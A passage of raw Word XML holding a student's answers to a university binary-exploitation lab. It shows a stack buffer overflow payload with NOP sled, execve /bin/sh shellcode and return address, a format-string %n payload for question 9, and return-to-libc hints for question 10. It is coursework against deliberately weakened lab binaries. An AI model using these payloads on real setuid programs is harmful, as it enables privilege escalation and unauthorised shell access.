                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3065145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51014AED" w14:textId="77777777" w:rsidR="00105D6F" w:rsidRDefault="00105D6F" w:rsidP="008005CB">
      <w:r w:rsidRPr="00105D6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48D4B51D" wp14:editId="60D60B09">
            <wp:extent cx="5731510" cy="1130935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108752387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3877" name="Picture 1" descr="A black background with white numbers&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1130935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF77AED" w14:textId="6993B8D4" w:rsidR="00497BB3" w:rsidRDefault="00105D6F" w:rsidP="008005CB">
      <w:r>
        <w:t xml:space="preserve">… </w:t>
      </w:r>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="766B791C" wp14:editId="53E0EBEA">
            <wp:extent cx="5731510" cy="1918970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14727110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11017" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1918970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED4110" w14:textId="04E55135" w:rsidR="00497BB3" w:rsidRDefault="00E2653C" w:rsidP="008005CB">
      <w:r>
        <w:t xml:space="preserve">Then calculate the size of each part to </w:t>
      </w:r>
      <w:r w:rsidR="00EF52A7">
        <w:t>generate a payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C899E0" w14:textId="77777777" w:rsidR="00EF52A7" w:rsidRDefault="0032184D" w:rsidP="008005CB">
      <w:r>
        <w:t>1024/4=256, 256+</w:t>
      </w:r>
      <w:r w:rsidR="001E565D">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>=26</w:t>
      </w:r>
      <w:r w:rsidR="001E565D">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B15E40" w:rsidRPr="00B15E40">
        <w:t>0xffffccac-0xffffc8a0</w:t>
      </w:r>
      <w:r w:rsidR="00B15E40">
        <w:t>=1036 byte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F32E36">
        <w:t>103</w:t>
      </w:r>
      <w:r w:rsidR="00C42FC6">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00F32E36">
        <w:t>-80-34=9</w:t>
      </w:r>
      <w:r w:rsidR="00C42FC6">
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="00F32E36">
        <w:t xml:space="preserve"> bytes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353795AE" w14:textId="101CC38C" w:rsidR="008005CB" w:rsidRDefault="00E3585C" w:rsidP="008005CB">
      <w:r>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="00F32E36">
        <w:t xml:space="preserve"> the payload should be: “</w:t>
      </w:r>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:t>"\x90"*</w:t>
      </w:r>
      <w:r w:rsidR="00105D6F">
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:t xml:space="preserve"> +"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80" + "A"*</w:t>
      </w:r>
      <w:r w:rsidR="00105D6F">
        <w:t>922</w:t>
      </w:r>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:t xml:space="preserve"> + "\x</w:t>
      </w:r>
      <w:r w:rsidR="00497BB3">
        <w:t>a0</w:t>
      </w:r>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="00497BB3">
        <w:t>c8</w:t>
      </w:r>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00497BB3" w:rsidRPr="00497BB3">
        <w:t>"'</w:t>
      </w:r>
      <w:r w:rsidR="00F32E36">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7185E" w14:textId="77347BAB" w:rsidR="00FD3C56" w:rsidRDefault="00FD3C56" w:rsidP="008005CB">
      <w:r w:rsidRPr="00C42FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33793E17" wp14:editId="4C6BFA74">
            <wp:extent cx="5731510" cy="3267710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3544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3878" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3267710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF68CF3" w14:textId="77D49026" w:rsidR="00EF52A7" w:rsidRDefault="00EF52A7" w:rsidP="008005CB">
      <w:r>
        <w:t>Run the code in and out the GDB to reach the goal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499FF9A5" w14:textId="77777777" w:rsidR="00C1658E" w:rsidRDefault="00C1658E" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C1658E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0965C453" wp14:editId="1309AA5B">
            <wp:extent cx="5731510" cy="3085465"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="138006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830" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3085465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6072E1F7" w14:textId="74D92651" w:rsidR="00615C03" w:rsidRPr="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>9. </w:t>
      </w:r>
      <w:r w:rsidRPr="00615C03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Bonus 3 points)</w:t>
      </w:r>
      <w:r w:rsidRPr="00615C03">
        <w:t> Go to /home/q8/. Exploit the program to get the secret. (Hint: Pretty much the same as the workshop, but you need to find out the address of target using gdb.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3253A12A" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>Hints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A9954" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="001A7868" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>All programs compiled with -m32 -g -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>-pie -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>-stack-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>protector</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27B919E3" w14:textId="2AF7218D" w:rsidR="00615C03" w:rsidRPr="001A7868" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>All pre-compiled programs are SETUID (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>u+s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>) and run as another user (user 'q1' for q1, 'q2' for q2, etc). You can check with ls -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0322E24D" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="001A7868" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7868">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>Refer to the source code for additional hints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCE6CBA" w14:textId="77777777" w:rsidR="00337077" w:rsidRDefault="00337077" w:rsidP="00C224E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3832230C" w14:textId="5EE6666A" w:rsidR="00337077" w:rsidRDefault="00337077" w:rsidP="00C224E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Using “GDB” to get the address of the variable “target” by the command “</w:t>
      </w:r>
      <w:r w:rsidRPr="00337077">
        <w:t>print &amp;target</w:t>
      </w:r>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE4D05" w14:textId="35CE6D55" w:rsidR="00C224E8" w:rsidRDefault="00337077" w:rsidP="00C224E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Then,</w:t>
      </w:r>
      <w:r w:rsidR="00C224E8">
        <w:t xml:space="preserve"> use the method mentioned in workshop5 to buffer </w:t>
      </w:r>
      <w:r w:rsidR="001A7868">
        <w:t>overflow</w:t>
      </w:r>
      <w:r w:rsidR="00C224E8">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:t>address of “target”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD93479" w14:textId="6B0DBB61" w:rsidR="003E5EC7" w:rsidRDefault="00C224E8" w:rsidP="003E5EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00C224E8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DA7AD8" wp14:editId="772D5609">
            <wp:extent cx="5731510" cy="2287270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117537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4588" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2287270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF2F9ED" w14:textId="0790BB59" w:rsidR="003E5EC7" w:rsidRDefault="00E3585C" w:rsidP="003E5EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Also,</w:t>
      </w:r>
      <w:r w:rsidR="00380F06">
        <w:t xml:space="preserve"> for the bonus by “</w:t>
      </w:r>
      <w:r w:rsidR="00380F06" w:rsidRPr="00380F06">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00380F06" w:rsidRPr="00380F06">
        <w:t>run_me</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00380F06" w:rsidRPr="00380F06">
        <w:t xml:space="preserve"> $(python -c "import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00380F06" w:rsidRPr="00380F06">
        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00380F06" w:rsidRPr="00380F06">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00380F06" w:rsidRPr="00380F06">
        <w:t>b'A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00380F06" w:rsidRPr="00380F06">
        <w:t xml:space="preserve">'*4 + b'\x2c\x90\x55\x56' + b'%08x.'*3 + b'%013029x' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00380F06" w:rsidRPr="00380F06">
        <w:t>b'%n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00380F06" w:rsidRPr="00380F06">
        <w:t>')")</w:t>
      </w:r>
      <w:r w:rsidR="00380F06">
        <w:t>” but no such file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7F7186" w14:textId="0385057F" w:rsidR="00380F06" w:rsidRPr="00615C03" w:rsidRDefault="00380F06" w:rsidP="003E5EC7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00380F06">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21309801" wp14:editId="4B2A25F6">
            <wp:extent cx="5731510" cy="3879215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10953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9967" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3879215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C50465D" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>Part II</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA845F0" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>10. </w:t>
      </w:r>
      <w:r w:rsidRPr="000D14A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Bonus 2 points)</w:t>
      </w:r>
      <w:r w:rsidRPr="00615C03">
        <w:t xml:space="preserve"> Return to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00615C03">
        <w:t>Libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="788FE505" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>Go to /home/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00615C03">
        <w:t>q9, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00615C03">
        <w:t xml:space="preserve"> exploit the pre-compiled program q9 to get the secret. The source code is provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4351F30B" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>You might need to read the source code to understand what's happening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E5BAFF" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00615C03" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00615C03">
        <w:t>Hints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D43A5D9" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00E3585C" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">The program expects a filename for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>[1], so the payload needs to be.... in a &lt;redacted&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6330BABD" w14:textId="6AFBD77E" w:rsidR="00615C03" w:rsidRPr="00E3585C" w:rsidRDefault="00615C03" w:rsidP="00E3585C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>In performing Step 8 of the workshop, replace </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:br/>
        <w:t>x/20s *((char **)environ + 30)</w:t>
      </w:r>
      <w:r w:rsidR="00E3585C" w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="00E3585C" w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>x/20s *((char **)environ)</w:t>
      </w:r>
      <w:r w:rsidR="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">to look for your environmental variable (SH) as it's usually further </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F78CD1C" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00E3585C" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>If your exploit succeeds in gdb (it should) but fails outside of gdb (as per workshop) you need to adjust the last 4 bytes of the payload carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861986B" w14:textId="77777777" w:rsidR="00615C03" w:rsidRPr="00E3585C" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>Make sure to run with full path /home/q9/q9 /&lt;full path to payload&gt; outside of gdb to be consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27544026" w14:textId="69B4C141" w:rsidR="00615C03" w:rsidRPr="00E3585C" w:rsidRDefault="00615C03" w:rsidP="00461B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>findenv.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> program would not work in this case, as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E3585C">
        <w:rPr>
          <w:color w:val="074F6A" w:themeColor="accent4" w:themeShade="80"/>
        </w:rPr>
        <w:t>[0] length will be different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855A803" w14:textId="6974469A" w:rsidR="00236129" w:rsidRDefault="00236129" w:rsidP="00236129">
